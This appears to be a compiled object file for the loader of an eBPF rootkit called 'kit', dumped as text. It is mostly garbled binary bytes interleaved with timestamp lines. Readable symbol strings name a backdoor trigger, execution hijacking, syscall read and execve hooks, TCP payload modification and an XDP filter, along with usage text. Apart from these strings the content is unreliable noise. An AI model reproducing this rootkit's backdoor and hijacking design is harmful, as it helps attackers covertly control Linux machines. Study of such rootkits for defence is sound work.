<00> p<00> <00>@9<05><00>v<05>0<00><05><00><00> <09><00><00> <09><00>5 <09><00>!<21><00><1E> <00>(<28>0<1E>@O<08>H<00> <09>`<00> p<00> <00>xwh<00>9 <00>m <00><00><00> <00> <00>  <00> 3)$ <00> a-(8 x<00>0@ <00> <00> 0H <00> <00> 4` <00>  (<00> <00> <00> <00> Q0<00> <00> t4<00> <00> <00>8
<00> <@
xLLP
<00> k HX
<00> <00> Lp
xwh<00>
<00> <00> t<00>
<00>  x<00>
<00> W <18><00>
<00> W 7<><00>
<00> W <<3C><00>
<00> W /<2F><00>
<00> W H<><00>
<00> W L<><00>
<00> W A<>( <00> <00> <1C>0 <00> <00> <0A>P !@<00> Y!D0 <00>!H<00> <00>!X<00> /"\<00> /"\<00> y"d <00>"<00>"<05>8 <00>"+# h <00>"j#<12><00> <00>"j# <0A><00> <00>"j#<12><00> <00>"j# <0A><00> <00>"j#<12><00> <00>"j# <0A><00> <00>"j#<12><00>"j# <0A><00>#l <00>#l(<00>#pp<00> <00><00> <00>#><3E><00><00> <00># <0C><00><00> 3$ <0A><00>x6<18><00><00> i <0A><00><00> u$ 0<00>$$<24>X %9<>x %*<2A><00> %<08><00>%<19>h<00> <00>% <0A>x<00> <00><00>% <09><00>-& <09><00><00><00> r& <00> BBJ<00>E-<00>K<00>KB BJxE|<00>K<00><00>EJBJ B BJ( B
B<00>
E|<00>
K<00><00>
EJ<00> E<00>!<00> E|<00> E|<00> E|<00> E<00>! E<00>!(E|0E<00>!<00>0<00>P<00>X<00><00>$<00><00> M *<00><00><00><00>`<00><00>i<00><00><00><00><00><00><00><00><00>@<00>@mP8<00>p<00>P!<00><00>(<00>hq<00>28<00><00><00>N0<00><00>"<00><00>x<00>`<00><00><00><00><00><00><00><00>` i<00> <00>@
<00>p
=<00>{<00>
P <00><00> <00><00> x<00> <00><00><00>h<00><00><00>h<00>xp<00><00><00>Y<00><00><00>Q<00>4<00><00>&D
&<00>0&V<00>os<00>*<00>3y<00><00>:$<00>4<00>L<00>*<00>j<00>x(<00><00><00>:<00>-a<00>-<00>&<00>H<00><00><00>,<00>Gu<00>&<00>!&UG&<00>m<00>&]<00>&C)<00>5<00> &3)V\<00>{*<00>$l3<00>B'Dt[<00>]6a
; 0  
2022-05-04 08:54:21 -04:00
<00>  ^0<00><00>h<00>@ Ro`r0r r o`o<00>o(o<00>o<00>o o<00>rt0oho<00>o<00>o(oXo oXopo<00>o8o<00>oo<00>o<00>oo0o<00>oo<00>oHopo<00>o<00>oH o` o<00> o<00> o
oX
o<00>
o0 o<00> o o8o<00>oho<00>o<00>o<00>o<00> t<00> u<00> r<00> q<00>
o<00>
o<00>
o<00>
o
o
o
o(
o4
o@
oL
oX
od
op
o|
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o
o 
o
o$
o0
o<
oH
oT
o`
ol
ox
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>
o<00>p,i<jLk\llm|n<00>i<00>i<00>j<00>j<00>j<00>j<00>jjj(j8jHjXjhjxj<00>j<00>j<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk k0k@kPk`kpk<00>k<00>k<00>k<00>k<00>k<00>k<00>k<00>kkk(l8lHlXlhlxl<00>l<00>l<00>l<00>l<00>l<00>l<00>l<00>l l l( l8 lH lX lh lx l<00> l<00> l<00> l<00> l<00> l<00> l<00> l<00> l
l
l(
l8
lH
lX
lh
lx
l<00>
l<00>
l<00>
l<00>
l<00>
l<00>
l<00>
l<00>
l l l( l8 lH lX lh lx l<00> l<00> l<00> m<00> m<00> m<00> n<00> n n n( n8 nH nX nh nx n<00> n<00> n<00> n<00> n<00> n<00> n<00> n<00> n n n( n8 nH nX nh nx n<00> n<00> n<00> n<00> n<00> n<00> n<00> n<00> nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn(n8nHnXnhnxn<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn$n4nDnTndntn<00>n<00>n<00>n<00>n<00>n<00>n<00>n<00>nnn$nz<7A>~}<7D>Q{wRS]cdefghiTUVWXYZ[\^_`ab|yxCDEFGHIKLMN=>?@ABJOP.text.rel.BTF.extipv4_csum.____fmtxdp_receive.____fmtmodify_payload.____fmtexpand_tcp_packet_payload.____fmthandle_tp_sys_exit_read.____fmttp_sys_enter_read.____fmtmanage_backdoor_trigger_v1.____fmttp_sys_enter_openat.reltp/syscalls/sys_enter_openat.bss.mapsfs_openrb_comm.relxdp_prog.llvm_addrsigexec_var_hijack_activexdp_receivetp_sys_enter_execve.reltp/syscalls/sys_enter_execvehijacker_statelicensetp_sys_exit_read.reltp/syscalls/sys_exit_readtp_sys_enter_read.reltp/syscalls/sys_enter_readhandle_sched_process_exectp/sched/sched_process_exec.strtab.symtab.rodata.rel.BTFLICENSELBB2_9LBB5_79LBB5_69expand_tcp_packet_payload.____fmt.69LB
X&P<00>2<00>&8\<00>&<00>; <00>b4H{<00> p<00> <00><>0<00> <00><><00><00> @<40>r P<>  `<60><00>X <00><>   <00><00>-L<>o<00>Ф:@
<EFBFBD>_
Usage: %s ./kit OPTION
Program OPTIONs-t[NETWORK INTERFACE]Activate XDP filter %-40s %-50s
-vVerbose mode-hPrint this helpFailed to increase RLIMIT_MEMLOCK limit!
%H:%M:%S%s INFO pid:%d code:%i, msg:%s
UNRECOGNIZED RB EVENT RECEIVEDActivating filter on network interface: %s
Error on input interfaceUnknown option: %c
Missing arguments for %c
:t:vhFailed to open and load BPF skeleton
Failed to load and verify BPF skeleton
Failed to create ring buffer
2022-05-04 08:54:21 -04:00
Filter set and ready<00> <00>
<04>9}}}<00><00>int<08><05><19><05><1B><05>9<05><1A> <08>
<EFBFBD> <00>1~ 3<07> 6 <09> 7 <09> 8 <09> 9 <09> : <09>( ; <09>0 < <09>8 = <09>@ @ <09>H A <09>P B <09>X D<16>` F<14>h H<07>p I<07>t J <0B>x M<12><00> N<0F><00> O<08><00> Q<0F><00> Y <0A><00> [<17><00> \<19><00> ]<14><00> ^ <09><00> _
-<00> `<07><00> b<08><00><19> + <08> <08><0F><00>9 <08> <08> <08><0F><00>9 ~<11><08><0E> <08> $<0E> ; <0C>
# <0A> 0
+|
/<0F>key
3<07>arg
7<0F>
:<07>doc
@<0F>
I<07>(

q<13> <08><00><15><15><15> <08><11>`
<08>
l
<07>

r
<07>
 }
$ } 
)<07>$
, <09>(
/
x0
2 <09>8
6 <09>@
9 <09>H
: <09>P
< <09>X 8
<EFBFBD><08>
<EFBFBD><1D>
<EFBFBD><11>
<EFBFBD><0F>doc
<EFBFBD><0F>
<EFBFBD>G
<EFBFBD> f(
<EFBFBD><0F>0
<EFBFBD> |
<EFBFBD>B
<EFBFBD>l
<EFBFBD><07>
<0F>
<07>
<EFBFBD> B<14>f<15><15><15> M <08> <08> <08> <12>tm8 & <07>
<07> <07> <07> <07> <07> <07> <07> <07>  <0C>( <0F>0<0F>D9} <06> 
    <0A><12>  <0A><08> <0A> <0C> <0A> <0C>}<0F>9}2E @ 8E<08>szG - N<0E> P<07> W<07> \<0E> _<08> c<0E>( j<0E>0
K<08> <08> <08> <08><0F>+<0F><0E>map<0F>+<0F> x <08><0F>j<0F><0E><0F>j<0F>u <08> { pH) sz -<0E>)  -obj0  <06>(
2022-05-04 08:54:21 -04:00
<06>, 6 0 <06>8<06><< @ /  <08> <08> 1<0F>R 9 ( <02> <13> <13> <13> <13>bss<13> 0<02> <17> <17> <17> <17> <17> <17>(0M
{ { {  { !{ "{( $ h
%<10> ' <09> (<08> )<08>  *<08>  +<08>  ,  - $ . 3 /<08> B 0. D 1<08> [ 2> ] 3<08> <00> 4N <00> 5^ <00> 6n <00>7n !8n G9N m:n <00>;n <00><~ <00>=n ><08> 3?N \@<08> {A<08> <00>B<08> <00>C<08> <00>D<08> E $F<08> 4G<08> LHB jIB xJB <00>K<08> <00>L<08> <00>Mn <00>Nn
On 0PVQ<08> oR<08> <00>S<00>T<00><0F><00> 9<0F><00> 9<0F> 9<0F> 9<0F>. 9<0F>> 9<0F>N 95<0F>^ 9<0F>n 9F<0F>~ 9%<0F><00> 94<0F><00> 9(<0F><00> 9)<0F><00> 9<0F><00> 92<0F><00> 9<0F><00> 9<0F><00> 9<0F>93<0F>9<0F>.9, <00>
<08>  <1E>obj <15> R  <04> 8 #<04> hbss&<05><00> U<05><00> <08> M
h
}<0E> <03>  !pid<06> 
& <09><12>
<EFBFBD><0F>7!9<00>  _all<0E> <0E>  <0C>all<0E> <0E>  <0C>all<0E> <0E> <0E> <0E> ! <0C>all"<0E> #<0E>
3 7 _ <06> $<06>&<03> , g -<0F> .<0F> 1 <0C> 2<0F> 5 <0C> 6<0F> 9 <0C> :<0F> (* + /? 3g 7<06> ;<06> .=<03>@3A envL <07>"env1 #G<16> $s<05><00><01>%s<0E><02>L%sr<02>@"rbt<02>`#u<02>h"errv <0B><02>T#<02><08><02>X"opt<02><06><02>\&<02> 'V <0C> <01><>(ctxV"<22><03><>%V-<2D><03><>%V:-<03><>"eW<19><03><>"tmZ <0A><03><>"ts[4<02>@"t\ ~<03><> ! <08>)I <01><>(sigI<1D><02>l*; <00><01>#<<10><02>P'1 <0C>N<01>b%14 <02>l%1G<31><02>`%1WE<02>X+ <00><01><>(arg $<24><02>X#$ <0B><02>`#% <0B><02>h'<01><01><00><01><>(obj<01>*<02>X"s<01><1E><02>h,err<01>'<01><01>0(obj<02>h-y<01>'ft<01><>%f7<66><02>X"objh<02>h.errs <08>/YC<01>(objY"<02>h% : ; 9 I$ >  : ;  : ; I8  $ > 5I  I
&I  : ; 9  : ; 9 I8 : ; 9 <I!I/ 7I4: ; 9 I?< : ; 9 I8 'II : ;9  : ;9 I8  : ; 9 > I: ; 9 (  : ;9 I8 & : ; 9  : ; 9  : ; 9 I8 > I: ; 9 !!I/"4: ; 9 I#4: ; 9 I$.?: ; 9 'I@<18>B%: ; 9 I&
: ; 9 '.: ; 9 'I@<18>B(: ; 9 I).: ; 9 '@<18>B*.: ; 9 '@<18>B+.?: ; 9 '@<18>B,
: ;9 -.: ; 9 'I@<18>B.
: ; 9 /.: ; 9 '@<18>B,<00>
^<00><01> .outputuser/usr/lib/gcc/x86_64-linux-gnu/10/include/usr/include/x86_64-linux-gnu/bits/usr/include/x86_64-linux-gnu/bits/types/usr/include/usr/include/asm-generic.output/bpfuser/../commonuser/include/moduleskit.skel.hkit.c<built-in>stddef.htypes.hstruct_FILE.hFILE.hstdio.hgetopt_core.hargp.htime_t.hstruct_tm.hresource.hint-ll64.hlibbpf.hmap_common.h module_manager.h
2022-05-04 08:54:21 -04:00
 <03><05> vtY<02><03>$5<1A>/
uu<05>LX Mb>$ <09>Y2 K<01>2 <09><01>.$<24>/
u<10><08>
<EFBFBD> <0B> <09> <0A><11>;<3B>'t/<'t
<EFBFBD><08><05><03><12><03><13><11>L <09>J<03> <09>J<11>L <09>J<03> <09>J<11>L <09>J<03> <09>J<11>K <09>J<14>L <09>J<03> <09>J<11>K <09>J<14>M<12>><3E>)t1<)t <0B><08><05><03><13><03><15><13>K<15><13>L
<EFBFBD>J<03>
<EFBFBD>J<13>K
<EFBFBD>J<13>L
<EFBFBD>J<03>
<EFBFBD>J<13>K
<EFBFBD>J<13>L
<EFBFBD>J<03>
<EFBFBD>J<13>K
<EFBFBD>J<13>L
<EFBFBD>J<03>
<EFBFBD>J<13>K
<EFBFBD>J<13>L
<EFBFBD>J<03>
<EFBFBD>J<13>K
<EFBFBD>J<13> L
2022-05-04 08:54:21 -04:00
<EFBFBD> <03><0E><03>qt<<03>  <09>Y(<03>p.<05>u <0B><><05><08>
<EFBFBD><05>
<08><><05><08>\?g#ft<
K u<08>&4<><10><06>K<08><01>!j
<EFBFBD>uD <t<19><02><07><02> <08><07>EK<03> -
<EFBFBD> Z
<EFBFBD> Z
<EFBFBD>[
 wY<06>w/<10> YI !<08><05><><10>u 1<><31><08> <0A><08><><EFBFBD>b<><08>#<23><>[ <05>u
2022-05-04 08:54:21 -04:00
<08><08><06>=g<08>^&u(<28>!<21>vv<08><06>.?<07>$uu<08>2<08> /?gu z.<08>J!<04>f vYERRORifindexhandle_tp_sys_exit_read_____fmt_25handle_tp_sys_exit_read_____fmt_26handle_tp_sys_exit_read_____fmt_27handle_tp_sys_exit_read_____fmt_28tp_sys_enter_read_____fmt_shortbufnamehandle_sched_process_exec_IO_lock_tgp_offsetstderrformattm_yday_IO_buf_endargp_statemessageoptoptchild_inputsrlim_tflagsxdp_receive_____fmt_20xdp_receive_____fmt_21xdp_receive_____fmt_22xdp_receive_____fmt_23xdp_receive_____fmt_24bpf_programhandle_tp_sys_exit_read_____fmt_30_IO_write_endunsigned intnext_freeres_listuser/kit.c_flags__RLIMIT_OFILEexec_module_attrroot_argpfs_openlinklevel__rlimit_resourcetm_mdayshort intbtf_custom_pathrlim_maxEXITGNU C17 10.3.0 -mtune=generic -march=x86-64 -g -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protectiontm_year__RLIMIT_LOCKSmodify_payload_____fmt_71print_help_dialogmodule_config_t__RLIM_NLIMITStm_mon_IO_save_endmmapedhandle_tp_sys_exit_read_____fmtrelaxed_core_relocsoverflow_arg_areaexpand_tcp_packet_payload_____fmt_66expand_tcp_packet_payload_____fmt_67expand_tcp_packet_payload_____fmt_68long long unsigned intcleanupattach_prog_fdexpand_tcp_packet_payload_____fmtkit_bpf__open_opts__RLIMIT_NPROCbpf_objectfs_module_attrkit_bpf__bsskconfigrb_eventexec_moduleLIBBPF_WARN_offsetmodify_payload_____fmttp_sys_enter_openatINFO_filenolibbpf_print_leveldata_sizeargp_optionsize_targs_doc_vtable_offset_markers_IO_read_base_Boolxdp_receive__RLIMIT_NICEargcxdp_module_attrkit_bpf__loadkit_bpfcodeprog_cntmodule_configmap_cnttm_hourbump_memlock_rlimitmapscharobject_name__rlim_t_mode__RLIMIT_NLIMITS_IO_markertp_sys_enter_execve_IO_read_ptrbpf_linkdataerr_streamxdp_receive_____fmt_1xdp_receive_____fmt_2xdp_receive_____fmt_3xdp_receive_____fmt_4xdp_receive_____fmt_5xdp_receive_____fmt_6__u32xdp_receive_____fmt_8xdp_receive_____fmt_9time_targp_domainipv4_csum_____fmtprog_skel_szlibbpf_print_fnhijacker_staterlim_cur_IO_write_baselong long intbpf_prog_skeletonsig_handlerhelp_filter_IO_save_basesched_module_attrheadermanage_backdoor_trigger_v1_____fmt_63handle_tp_sys_exit_read_____fmt_29event_type__RLIMIT_RSSring_buffer__RLIMIT_MSGQUEUE_freeres_buf_IO_backup_basemanage_backdoor_trigger_v1_____fmtLIBBPF_INFORLIMIT_AS__pad5long unsigned intprogsRLIMIT_FSIZEkit_bpf__destroyargpoptargargsargvlong doubleparsertp_sys_enter_readxdp_modulefs_moduleargp_childlinksrb_commRLIMIT_DATArlimit_IO_read_endexec_var_hijack_activerodataRLIMIT_CPUmodule_config_attr_tlong intoptionserror_tgroupexpand_tcp_packet_payload_____fmt_65_IO_wide_dataexpand_tcp_packet_payload_____fmt_69__RLIMIT_SIGPENDING__va_list_tagexitingpstateskeletonfp_offsetmanage_backdoor_trigger_v1_____fmt_62tp_sys_exit_readmanage_backdoor_trigger_v1_____fmt_64optskit_bpf__openargp_parser_tbpf_map_skeleton_IO_buf_base_wide_dataRLIMIT_NOFILE__empty_lockprog_IO_codecvt_old_offset_IO_FILEreg_save_arearelaxed_mapsrlim_newLIBBPF_DEBUGdata_szinputevent_type_ttm_mintm_zonehandle_rb_eventpin_root_pathunsigned char__RLIMIT_RTTIMElinequoted_IO_write_ptr__RLIMIT_RTPRIOsched_modulebpf_object_open_optsbpf_object_skeletonmodule_config_attr__time_t_codecvt__RLIMIT_MEMLOCKtm_wdayarg_numDEBUGout_stream__off_tkit_bpf__create_skeletonverbosemap_skel_szsigned charxdp_receive_____fmt_7short unsigned inttm_secmainbpf_maptm_isdstxdp_receive_____fmtchildren/home/osboxes/TFG/srctm_gmtoff_chainRLIMIT_STACKkit_bpf__rodataFILEdesc_flags2RLIMIT_CORE_cur_columnskelhook__off64_t_unused2xdp_receive_____fmt_10xdp_receive_____fmt_11xdp_receive_____fmt_12xdp_receive_____fmt_13xdp_receive_____fmt_14xdp_receive_____fmt_15xdp_receive_____fmt_16xdp_receive_____fmt_17xdp_receive_____fmt_18GCC: (Ubuntu 10.3.0-1ubuntu1) 10.3.0GNU<00>zRx <08>CE
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&
2022-05-04 08:54:21 -04:00
 D<>+
 <00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>4
2022-05-04 08:54:21 -04:00
 b<>9
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>L
3<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>e
<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y
4<00><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

2022-05-04 08:54:21 -04:00
<00>

2022-05-04 08:54:21 -04:00
<00> )
.
<00><
2022-05-04 08:54:21 -04:00
* A
<00>
M
<00>Y
2022-05-04 08:54:21 -04:00
<00>
e
2022-05-04 08:54:21 -04:00
<00>q
<00> <00>
<00><00>
2022-05-04 08:54:21 -04:00
D <00>
p <00>
N <00>
<00><00>
2022-05-04 08:54:21 -04:00
'
<00>
2022-05-04 08:54:21 -04:00
 <00>
5<00>
k<00>
2022-05-04 08:54:21 -04:00
<00> <00>
Z<00>
2022-05-04 08:54:21 -04:00
<00> 
#
<00>
2022-05-04 08:54:21 -04:00
<00> ,
<00>9
<00>F
2022-05-04 08:54:21 -04:00
n S
<00>`
2022-05-04 08:54:21 -04:00
q m
z
'<00>
2022-05-04 08:54:21 -04:00
<00><00>
<00><00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
c<00>
2022-05-04 08:54:21 -04:00
 <00>
<00> <00>
<00>
<00><00>
<00> 
2022-05-04 08:54:21 -04:00
<00> 
+#
2022-05-04 08:54:21 -04:00
<00> 0
~ =

J
2022-05-04 08:54:21 -04:00
<00>W
# d
tq
2022-05-04 08:54:21 -04:00
?
<00>
<00><00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
k
<00>
<00><00>
2022-05-04 08:54:21 -04:00
e 
'
2022-05-04 08:54:21 -04:00
8
!
<00>.
<00>U
Bo
2022-05-04 08:54:21 -04:00
@
<00>
2022-05-04 08:54:21 -04:00
R <00>
<00>
J<00>
<00><00>
2022-05-04 08:54:21 -04:00
q <00>
<00>
B 
2022-05-04 08:54:21 -04:00
 
g (
 6
.D
2022-05-04 08:54:21 -04:00
0R
<00>`
<00>n
2022-05-04 08:54:21 -04:00
 |
<00>
<00>
2022-05-04 08:54:21 -04:00
` <00>
0
<00>
2022-05-04 08:54:21 -04:00
<00> <00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
<00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> 
` 
B&
G4
2022-05-04 08:54:21 -04:00
@

<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
 <00>
9<00>
y<00>
<00><00>
2022-05-04 08:54:21 -04:00
7<00>
<00> <00>
<00>
2022-05-04 08:54:21 -04:00
<00> 
<00> 
 )
<00>0
iE
gW
2022-05-04 08:54:21 -04:00

]
B c
<00> i
<00> o
u
<00>{
<00> <00>
*<00>
2022-05-04 08:54:21 -04:00
 <00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
?<00>
<00>
<00>
2022-05-04 08:54:21 -04:00
<00><00>
<00><00>
2022-05-04 08:54:21 -04:00
| <00>
R <00>
z<00>
<00><00>
;<00>
2022-05-04 08:54:21 -04:00
<00> <00>
<00><00>
2022-05-04 08:54:21 -04:00
<00><00>
T
2022-05-04 08:54:21 -04:00
v !
k3
9
2022-05-04 08:54:21 -04:00
 ?
<00> L
<00> e
_r
2022-05-04 08:54:21 -04:00
<00> 
<00><00>
6 <00>
<00><00>
<00>
2022-05-04 08:54:21 -04:00
<00><00>
<00><00>
<00><00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
` 
<00>
<00>2
<00>@
<00>N
2022-05-04 08:54:21 -04:00
<00> \
\q
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
<00><00>
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
1<00>
2022-05-04 08:54:21 -04:00
B <00>
U<00>

<00>
2022-05-04 08:54:21 -04:00
< \
<00> i
Tv
<00> <00>

<00>
<00><00>
<00> <00>
 <00>
J<00>
<00><00>
<00><00>
<00>
2022-05-04 08:54:21 -04:00
<00> 
2022-05-04 08:54:21 -04:00
 &
2022-05-04 08:54:21 -04:00
J3
2022-05-04 08:54:21 -04:00
<00>@
2022-05-04 08:54:21 -04:00
<00>N
2022-05-04 08:54:21 -04:00
<00>[
2022-05-04 08:54:21 -04:00
<00>i
2022-05-04 08:54:21 -04:00
<00> w
2022-05-04 08:54:21 -04:00
<00><00>
2022-05-04 08:54:21 -04:00
<00> <00>
2022-05-04 08:54:21 -04:00
<00><00>
2022-05-04 08:54:21 -04:00
<00><00>
2022-05-04 08:54:21 -04:00
<00><00>
2022-05-04 08:54:21 -04:00
<00>
2022-05-04 08:54:21 -04:00
(<00>
2022-05-04 08:54:21 -04:00
><00>
2022-05-04 08:54:21 -04:00
Z <00>
2022-05-04 08:54:21 -04:00
Z<00>
2022-05-04 08:54:21 -04:00
p
H
_
v-
<00>:
<00>H
<00>V
<00>d
<00>r
<00>
H<00>
_<00>
v<00>
<00><00>
<00><00>
<00><00>
<00>
1<00>
T<00>
w
t
<00>(
<00>6
<00>
2022-05-04 08:54:21 -04:00
D
NR
 `
<00>n
F
|
<00><00>
<00>
D<00>
y
<00>
<00><00>
3<00>
N/
 <
<00>
V
Uc
< p
<00> <00>

<00>
^<00>
 <00>
<00><00>
<00>

<00>

<00>


<00>8
<00> R
<00>`
<00> z
<00><00>
<00> <00>
<00> <00>
 <00>
J<00>
<00>
<00><00>
z<00>
<00> 
<00> 
<00> &
4
z@
<00>M
Z
Bh
5u
<00> <00>
<00><00>
<00> <00>
9<00>
<00> <00>

<00>
+<00>
<00> <00>
<00> <00>
<00> <00>



#&
<00> ?
: Zc
<00>
py
<00> <00><00><00>
<00><00>
q <00>
+<00>

<00>
q

<00>
& *<00>Q
<00>a
~<00>
<00>p<00>
A<00><00>
<00> 
<00><00>5
aD
<00>S
l c
hj<00><00>
b <00>
<00>
! <00><00><00><00><00>
<00>
<00>1
D <<00>O
<00>ZCq
? <00><00><00>
O <00>
<00> @C`<00><00><00><00><00><00><00><00><00><00> p@<00>`<00>.symtab.strtab.shstrtab.rela.text.data.bss.rodata.rela.debug_info.debug_abbrev.rela.debug_aranges.rela.debug_line.debug_str.comment.note.GNU-stack.note.gnu.property.rela.eh_frame @<00>
2022-05-04 08:54:21 -04:00
@<00><><00> &<00>
,<00>
1<00>
2022-05-04 08:54:21 -04:00
{<7B>>S<><00>9@<00><00>J#<23><00>]<00>0X@0 q0<>bl@H }0<00><><00>0<00><>&<00><00><><00><00><> <00><00><>x<00>@`h<><00> `<60>7h <00>